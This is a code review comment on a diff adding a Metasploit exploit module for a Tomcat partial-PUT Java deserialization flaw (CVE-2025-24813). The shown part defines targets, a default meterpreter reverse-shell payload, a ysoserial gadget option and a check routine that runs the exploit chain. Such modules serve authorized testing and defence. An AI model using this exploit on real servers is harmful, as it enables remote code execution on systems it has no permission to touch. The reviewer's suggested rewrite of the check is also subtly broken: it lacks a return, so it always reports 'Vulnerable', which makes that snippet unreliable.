modules/exploits/multi/http/tomcat_partial_put_deserialization.rb

```diff
@@ -0,0 +1,175 @@
+  include Msf::Exploit::JavaDeserialization
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Tomcat Partial PUT Java Deserialization',
+        'Description' => %q{
+          This module exploits a Java deserialization vulnerability in Apache
+          Tomcats's session restoration functionality that can be exploited with a partial PUT
+          to place an attacker controlled deserialisazion payload in the work directory.
+
+          For the exploit to succeed, writes must be enabled for the default servlet,
+          and org.apache.catalina.session.PersistentManager must be configured to use
+          org.apache.catalina.session.FileStore.
+
+          Verified working on 10.1.16-1
+        },
+        'Author' => [
+          'sw0rd1ight', # Discovery
+          'Calum Hutton', # MSF Module
+          'h4ck3r-04' # MSF Module
+        ],
+        'References' => [
+          ['CVE', '2025-24813'],
+          ['URL', 'https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2025-24813'],
+        ],
+        'DisclosureDate' => '2025-03-10', # Vendor release note
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux', 'win'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_cmd
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 443
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('GADGET', [true, 'ysoserial gadget', 'CommonsBeanutils1']),
+    ])
+  end
+
+  def check
+    # Advanced check, runs the full exploit (without a command)
+    # Assumes a 500 response from requesting the session indicates success
+    begin
+      upload_session_id = upload_payload('')
+      unless upload_session_id
+        return Exploit::CheckCode::Safe
+      end
+    rescue Msf::Exploit::Failed => e
+      return CheckCode::Safe(e)
+    end
+
+    trigger_res = trigger_payload(upload_session_id)
+    if trigger_res&.code == 500
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
```

Comment:
```suggestion
    trigger_res = trigger_payload(upload_session_id)
    if trigger_res&.code != 500
      Exploit::CheckCode::Safe
    end
    
    Exploit::CheckCode::Vulnerable
```

This makes the flow easier to follow :)